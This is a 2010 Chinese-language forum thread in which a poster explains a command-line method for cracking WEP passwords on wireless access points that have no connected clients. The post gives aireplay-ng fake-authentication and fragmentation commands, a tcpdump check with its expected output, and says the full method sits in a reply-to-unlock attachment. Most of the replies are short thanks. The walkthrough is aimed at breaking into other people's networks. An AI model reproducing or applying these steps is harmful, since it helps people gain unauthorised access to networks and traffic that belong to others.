无客户端P解,命令行下成功率最高!
本帖最后由 穿山甲 于 2010-1-15 12:46 编辑无客户端P解,还是命令行下成功率最高
近期研究卡H,真是个好东西,不过遇到好多都没有客户端在线,也没有数据流动,用spoonwep2难以P解,经过在本站不断学习,觉得命令行下P解成功率高得多,现把2个关键环节说明如下,倾听大家的意见:
一是“虚连接”必须要成功
用自己的网卡与AP建立“虚连接”
aireplay-ng -1 0 -e AP的essid -a AP的mac -h 自己网卡的mac wlan0
这时,系统将回显
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful:-) (aid:1)
然后用下面的命令来检查是否已经连接到AP上
tcpdump –n –e –s0 –vvv –i wlan0
成功:则不停闪出数据,按Crtl+C 终止Tcpdump进程,会在最后三行看到以下数据显示:
XXX packets captured
XXX packets recerved by filter
XXX packets dropped by kernel
不成功:如果没有连接成功,AP会告诉你未连接,这样AP会忽略来自网卡的注入包,P解不会成功!
二是必须用另一张卡H来“假连接”,以获得至关重要的一个xor文件
如果上面的虚连接成功,就执行下面假连接
aireplay-ng-5 -b ap的mac -h 自己网卡的mac rausb0
然后用另一个卡H,随便输入10位密码,“假连接”AP ,来获得xor文件
如果一切顺利,系统将回显
Use this packet ?
y 回车,将得到一个至关重要的xor文件。
再输入ls查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。
其它的P解方法都跟网上的差不多!
完整的方法在附件中,请回复下载!
**** Hidden Message ***** 学习学习学习 xiangxide kan kan seeeeeeeeeeeeeeeeeeeeeeeeee 附加里的是什么吖??? 学习一下!!!!!! 回复 1# 穿山甲
该方法可以推广一下,不过对方无线路由器的信号一定要好才行哦 应该不错 顶一下!! 本帖隐藏的内容需要回复才可以浏览 回复 1# 穿山甲
haohaoxuexiyixia !!!!!!!!!!!!!!!! 来看看 学习哈 回复 1# 穿山甲
认真学习!